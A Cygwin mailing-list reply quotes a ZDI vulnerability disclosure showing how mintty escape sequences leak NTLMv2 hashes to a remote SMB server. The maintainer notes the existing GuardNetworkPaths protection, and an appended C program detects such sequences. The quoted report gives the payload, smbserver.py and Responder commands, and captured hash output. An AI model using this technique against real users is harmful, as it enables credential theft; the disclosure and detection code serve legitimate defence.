Message-ID: <febc84e3-e14c-4b74-a28f-0bddcd3b79c2@towo.net>
Date: Fri, 16 Aug 2024 20:56:32 +0200
MIME-Version: 1.0
User-Agent: Mozilla Thunderbird
Subject: Re: ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation
 Information Disclosure Vulnerability
To: cygwin@cygwin.com
References: <DM5PR0102MB34771F931BA1B90A126291DE80812@DM5PR0102MB3477.prod.exchangelabs.com>
In-Reply-To: <DM5PR0102MB34771F931BA1B90A126291DE80812@DM5PR0102MB3477.prod.exchangelabs.com>
Precedence: list
List-Id: General Cygwin discussions and problem reports <cygwin.cygwin.com>
List-Unsubscribe: <https://cygwin.com/mailman/options/cygwin>,
 <mailto:cygwin-request@cygwin.com?subject=unsubscribe>
List-Archive: <https://cygwin.com/pipermail/cygwin/>
List-Post: <mailto:cygwin@cygwin.com>
List-Help: <mailto:cygwin-request@cygwin.com?subject=help>
List-Subscribe: <https://cygwin.com/mailman/listinfo/cygwin>,
 <mailto:cygwin-request@cygwin.com?subject=subscribe>
From: Thomas Wolff via Cygwin <cygwin@cygwin.com>
Reply-To: Thomas Wolff <towo@towo.net>
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"; Format="flowed"
Errors-To: cygwin-bounces~archive-cygwin=delorie.com@cygwin.com
Sender: "Cygwin" <cygwin-bounces~archive-cygwin=delorie.com@cygwin.com>


On 16.08.2024 at 16:25, zdi-disclosures--- via Cygwin wrote:
> The attachment could not be scanned for viruses because it is a password protected file.
> ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
???
> -- CVSS -----------------------------------------
>
> 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
>
> -- ABSTRACT -------------------------------------
>
> Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:
> Mintty - Mintty
>
> -- VULNERABILITY DETAILS ------------------------
> * Version tested: 3.7.1 (Git-2.45.2-64-bit.exe)
> * Installer file: Git-2.45.2-64-bit.exe
> * Platform tested: win11 23h2 [Version 10.0.22631.3593]
>
> ---
>
> ### Analysis
>
> ```
> Several escape sequences can cause the mintty process to access a file in a specific path.
> It is triggered by simply printing them out on bash, e.g. \x1b]7773;//0.0.0.0/test\007
> An attacker can specify an arbitrary network path and negotiate an NTLM hash out of the victim's machine to an attacker-controlled remote host.
> NetNTLMv2 hashes can be used to Pass the Hash, or for password cracking using tools like hashcat or John the Ripper.
>
> It's caused by an API provided by MSYS2.
> The API is used to convert between POSIX and Windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability.
> The same code is forked from Cygwin, so it could also theoretically be vulnerable.
>
> In the exploit, it used the escape code for setting the terminal icon, OSC 7773,
> but it can be done with other escape codes as well.
> For example, there's an escape code for indicating the cwd of the shell,
> which can lead to mintty `stat`ing the directory, which is sufficient for exploitation.
> ```
>
> The following cover most of the escape codes that could be exploited:
> ```
> - OSC I / OSC 7773
> - OSC 440
> - OSC 11
> - OSC 7
> - OSC 8
> ```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting
prevents this exploit.
Thomas

> The call stack is roughly the following:
> ```
> mintty:
> src/winmain.c:308 - guardpath
> src/charset.c:1104 - path_posix_to_win_w
> msys2:
> cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless)
> winsup/cygwin/path.cc:3909 - cygwin_conv_path
> winsup/cygwin/path.cc:660 - path_conv::check
> ```
>
> `path_conv::check` calls several Windows APIs that cause a connection to a remote path to be initiated.
>
>
>
> Here are the reproduction steps.
>
> Setup an attacker vm (Linux based) and a victim vm (windows).
>
> Modify the payload for the appropriate IP address (attacker VM's IP):
>
> ```
> \x1b]7773;//0.0.0.0/test\007
> ```
>
> On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled:
>
> ```
> sudo smbserver.py -ts -smb2support test .
> ```
>
> ```
> sudo ./Responder.py -I enp1s0 -v
> ```
>
> Replace `enp1s0` with the proper interface.
>
> Make sure that other smb services aren't running:
>
> ```
> systemctl status smbd.service
> systemctl status nmbd.service
> ```
>
> Print the adjusted payload from the beginning in mintty (git-bash.exe).
>
> The victim's hash should be printed by impacket or Responder.
>
>
>
>
> Here is the output from Responder
> ```
> [+] Listening for events...
>
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:331cb34ad722601a[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:ae5464fd841bcab[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:3bd0a49004b[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:c089b70c3accfaf[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:daa3eae276eaef[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:44db8723d9666e[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:0a070bdf7688033f[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc[...]
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> ```
>
> procmon log
> ```
> Date:   7/8/2024 2:07:57.3678237 PM
> Thread: 4844
> Class:  File System
> Operation:      CreateFile
> Result: ACCESS DENIED
> Path:   \\[attacker IP]\test007\
> Duration:       0.0112557
> Desired Access: Read EA, Read Attributes, Read Control
> Disposition:    Open
> Options:        Open Reparse Point
> Attributes:     n/a
> ShareMode:      Read, Write, Delete
> AllocationSize: n/a
>
> Description:
> Company:
> Name:   bash.exe
> Version:
> Path:   C:\Program Files\Git\usr\bin\bash.exe
> Command Line:   "C:\Program Files\Git\usr\bin\bash.exe" --login -i
> PID:    6172
> Parent PID:     1844
> Session ID:     1
> User:   DESKTOP-QAVUII5\wmliang
> Auth ID:        00000000:0015a222
> Architecture:   64-bit
> Virtualized:    False
> Integrity:      Medium
> Started:        7/8/2024 2:07:57 PM
> Ended:  7/8/2024 2:07:57 PM
> Modules:
> bash.exe        0x100400000     0x245000        C:\Program Files\Git\usr\bin\bash.exe                   1/14/2024 5:25:36 AM
> msys-2.0.dll    0x210040000     0x1227000       C:\Program Files\Git\usr\bin\msys-2.0.dll       Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM
>
> 0       FLTMGR.SYS      FltGetStreamContext + 0x20cb    0xfffff8045abe961b      C:\Windows\System32\drivers\FLTMGR.SYS
> 1       FLTMGR.SYS      FltGetStreamContext + 0x1b51    0xfffff8045abe90a1      C:\Windows\System32\drivers\FLTMGR.SYS
> 2       FLTMGR.SYS      FltRequestFileInfoOnCreateCompletion + 0x4ef    0xfffff8045ac21f6f      C:\Windows\System32\drivers\FLTMGR.SYS
> 3       ntoskrnl.exe    IofCallDriver + 0x55    0xfffff80455c29b45      C:\Windows\system32\ntoskrnl.exe
> 4       ntoskrnl.exe    ProbeForWrite + 0x40fe  0xfffff8045619c8be      C:\Windows\system32\ntoskrnl.exe
> 5       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1844   0xfffff804560cc9e4      C:\Windows\system32\ntoskrnl.exe
> 6       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1f2    0xfffff804560cb392      C:\Windows\system32\ntoskrnl.exe
> 7       ntoskrnl.exe    NtCreateFile + 0x4c1    0xfffff80456194311      C:\Windows\system32\ntoskrnl.exe
> 8       ntoskrnl.exe    NtCreateFile + 0x79     0xfffff80456193ec9      C:\Windows\system32\ntoskrnl.exe
> 9       ntoskrnl.exe    setjmpex + 0x9045       0xfffff80455e2d505      C:\Windows\system32\ntoskrnl.exe
> 10      ntdll.dll       NtCreateFile + 0x14     0x7ffb3fdf03f4  C:\Windows\System32\ntdll.dll
> 11      msys-2.0.dll    setpassent + 0x2ff3     0x2100929c3     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 12      msys-2.0.dll    cygwin_split_path + 0x2c68      0x210096988     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 13      msys-2.0.dll    sigfillset + 0x6935     0x2100c40a5     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 14      msys-2.0.dll    sigfillset + 0x7f98     0x2100c5708     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 15      msys-2.0.dll    sigfillset + 0x9f81     0x2100c76f1     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 16      msys-2.0.dll    timegm + 0x4db  0x210193f2b     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 17      <unknown>       0x110000000     0x110000000
>
> ```
>
>
> -- CREDIT ---------------------------------------
> This vulnerability was discovered by:
> solid-snail working with Trend Micro Zero Day Initiative
>
> -- FURTHER DETAILS ------------------------------
>
> Supporting files:
>
>
> If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
>
> Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
>
> Zero Day Initiative
> zdi-disclosures@trendmicro.com
>
> The PGP key used for all ZDI vendor communications is available from:
>
>    http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc
>
> -- INFORMATION ABOUT THE ZDI --------------------
> Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
>
> Please contact us for further details or refer to:
>
>    http://www.zerodayinitiative.com
>
> -- DISCLOSURE POLICY ----------------------------
>
> Our vulnerability disclosure policy is available online at:
>
>    http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> TREND MICRO EMAIL NOTICE
>
> The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system.
>
> For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy<http://www.trendmicro.com/privacy>
>


-- 
Problem reports:      https://cygwin.com/problems.html
FAQ:                  https://cygwin.com/faq/
Documentation:        https://cygwin.com/docs.html
Unsubscribe info:     https://cygwin.com/ml/#unsubscribe-simple
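As an added example for this thread (my own code, not mintty's GuardNetworkPaths implementation and not ZDI's proof of concept), the C program below shows the check a terminal needs before it hands an OSC path argument to the POSIX/Windows path-conversion layer: parse the OSC, pull out the path field for the selectors the report names, and refuse anything that would resolve on another host (UNC `//host/share` or `\\host\share`, the `\\?\UNC\host\share` long-path form, and a `file://` URI whose host is neither empty nor localhost). Run over recorded pty output, the same scanner doubles as a detector for the payload. Assumptions: the selector-to-path mapping for OSC 7773, I and 440 follows the report's description, OSC 7 and OSC 8 follow their usual file-URI and `params;URI` layouts, OSC 11 is left out because this page does not show its payload layout, and the sample stream is constructed.

```c
/* OSC path guard and detector (added example; not mintty's own code).
 * Finds OSC sequences in a byte stream, extracts the path argument for the
 * selectors the report names, and classifies it as local or network. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ESC 0x1b
#define BEL 0x07

static bool is_sep(char c) { return c == '/' || c == '\\'; }

static bool prefix_ci(const char *s, const char *pre)   /* case-insensitive prefix */
{
    for (; *pre; s++, pre++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*pre)) return false;
    return true;
}

/* True when p names a resource on another host: //host/share, \\host\share,
 * \\?\UNC\host\share, \\.\UNC\host\share, file://host/path with a host other
 * than "" or localhost, and file:////host/share. The Win32 long-path and
 * device forms \\?\C:\... and \\.\... stay local. */
bool is_network_path(const char *p)
{
    if (prefix_ci(p, "file:")) {
        p += 5;
        if (p[0] == '/' && p[1] == '/') {
            const char *host = p + 2;
            size_t hlen = strcspn(host, "/\\");
            if (hlen > 0 && !(hlen == 9 && prefix_ci(host, "localhost")))
                return true;                       /* file://host/... */
            p = host + hlen;   /* file:///C:/x -> "/C:/x", file:////h/s -> "//h/s" */
        }
    }
    if (!(is_sep(p[0]) && is_sep(p[1])))
        return false;                              /* rooted or drive path: local */
    if ((p[2] == '?' || p[2] == '.') && is_sep(p[3]))
        return prefix_ci(p + 4, "UNC") && is_sep(p[7]);   /* \\?\UNC\ only */
    return true;                                   /* plain UNC */
}

typedef struct { char code[16]; char payload[512]; } osc_t;

/* Parse one OSC starting at buf[*pos] (ESC ']' selector [';' payload] BEL|ST).
 * Advances *pos past the terminator; a truncated sequence returns false. */
static bool parse_osc(const char *buf, size_t n, size_t *pos, osc_t *o)
{
    size_t i = *pos + 2, k = 0;
    while (i < n && buf[i] != ';' && buf[i] != BEL && buf[i] != ESC) {
        if (k + 1 < sizeof o->code) o->code[k++] = buf[i];
        i++;
    }
    o->code[k] = '\0';
    if (i < n && buf[i] == ';') i++;
    for (k = 0; i < n && buf[i] != BEL && buf[i] != ESC; i++)
        if (k + 1 < sizeof o->payload) o->payload[k++] = buf[i];
    o->payload[k] = '\0';
    if (i < n && buf[i] == BEL) { *pos = i + 1; return true; }
    if (i + 1 < n && buf[i] == ESC && buf[i + 1] == '\\') { *pos = i + 2; return true; }
    *pos = n;
    return false;
}

/* Path field per selector (assumed mapping): 7773/I/440 carry a bare path as
 * the report describes, 7 carries a file:// URI, 8 is "params;URI". */
static const char *osc_path_arg(const osc_t *o)
{
    if (!strcmp(o->code, "7") || !strcmp(o->code, "7773") ||
        !strcmp(o->code, "I") || !strcmp(o->code, "440"))
        return o->payload;
    if (!strcmp(o->code, "8")) {
        const char *uri = strchr(o->payload, ';');
        return uri ? uri + 1 : NULL;
    }
    return NULL;
}

/* Walk a byte stream and return how many OSC sequences carry a network path,
 * copying up to max of them into hits as "selector:path". Use it as the
 * guard before path conversion, or as a detector over recorded pty output. */
int scan_for_network_paths(const char *buf, size_t n, char hits[][600], int max)
{
    int found = 0;
    for (size_t pos = 0; pos + 1 < n; ) {
        if (buf[pos] != ESC || buf[pos + 1] != ']') { pos++; continue; }
        osc_t o;
        if (!parse_osc(buf, n, &pos, &o)) break;
        const char *path = osc_path_arg(&o);
        if (path && is_network_path(path)) {
            if (found < max) snprintf(hits[found], 600, "%s:%s", o.code, path);
            found++;
        }
    }
    return found;
}

int main(void)
{
    /* Constructed sample stream: the report's PoC, two local cwd reports
     * (BEL- and ST-terminated), a local \\?\ long path, a remote hyperlink
     * target, and a remote cwd report. */
    static const char sample[] =
        "\x1b]7773;//0.0.0.0/test\x07$ pwd\n"
        "\x1b]7;file:///home/zdi\x07"
        "\x1b]7;file://localhost/C:/Users/zdi\x1b\\"
        "\x1b]7773;\\\\?\\C:\\icons\\x.ico\x07"
        "\x1b]8;;file:////192.0.2.10/share/a.txt\x07link\x1b]8;;\x07"
        "\x1b]7;file://192.0.2.10/share\x07";
    char hits[8][600];
    int n = scan_for_network_paths(sample, sizeof sample - 1, hits, 8);
    printf("%d network-path OSC sequence(s)\n", n);      /* prints 3 */
    for (int i = 0; i < n && i < 8; i++) printf("  refuse %s\n", hits[i]);
    return 0;
}
```

The guard deliberately fails closed on anything with two leading separators except the `\\?\` and `\\.\` device namespaces, where only the `UNC\` sub-namespace is treated as remote; a terminal that wants the equivalent of mintty's GuardNetworkPaths default simply drops the sequence when `is_network_path()` returns true instead of passing the string to the converter, and a session recorder can log the "selector:path" hits as an indicator that someone tried the technique.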
